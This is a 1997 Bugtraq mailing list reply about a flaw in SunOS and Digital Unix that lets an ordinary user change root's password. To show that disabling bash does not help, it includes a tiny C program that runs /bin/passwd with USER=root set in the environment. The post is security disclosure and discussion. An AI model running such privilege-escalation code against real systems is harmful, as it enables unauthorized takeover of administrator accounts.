[4525] in bugtraq
Re: SunOS exploit. & DigitalUnix
daemon@ATHENA.MIT.EDU (Joe Zbiciak)
Tue May 20 16:37:17 1997
Date: Tue, 20 May 1997 08:00:37 -0500
Reply-To: jzbiciak@DALDD.SC.TI.COM
From: Joe Zbiciak <jzbiciak@DALDD.SC.TI.COM>
X-To: mmokrejs@PRFDEC.NATUR.CUNI.CZ
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.3.96.970520101310.1759F-100000@prfdec.natur.cuni.cz>
from "Martin Mokrejs" at May 20, 97 10:17:29 am
'Martin Mokrejs' said previously:
|
| This also works on Digital Unix 4.0B :-(
|
| login as generic user, than run bash,
[...]
| I succesfully modified root's password :-( Even we have C2 security
| installed :-(
|
| I suggest - disable bash !!!
Wrong answer!
If bash can do it, then ANY user-level process can do it.
Here's a program I whipped together in under a minute. If I can do that
in a minute, what's disabling bash going to do?
main () {
char * argv[] = { "passwd", "root", 0 };
char * envp[] = { "USER=root", 0 };
execve("/bin/passwd",argv,envp);
}
--Joe
--
+--------------Joseph Zbiciak--------------+
|- - - - jzbiciak@daldd.sc.ti.com - - - - -|
| - - http://ee1.bradley.edu/~im14u2c/ - - | Not your average "Joe."
|- - - - Texas Instruments, Dallas - - - -|
+-------#include <std_disclaimer.h>--------+
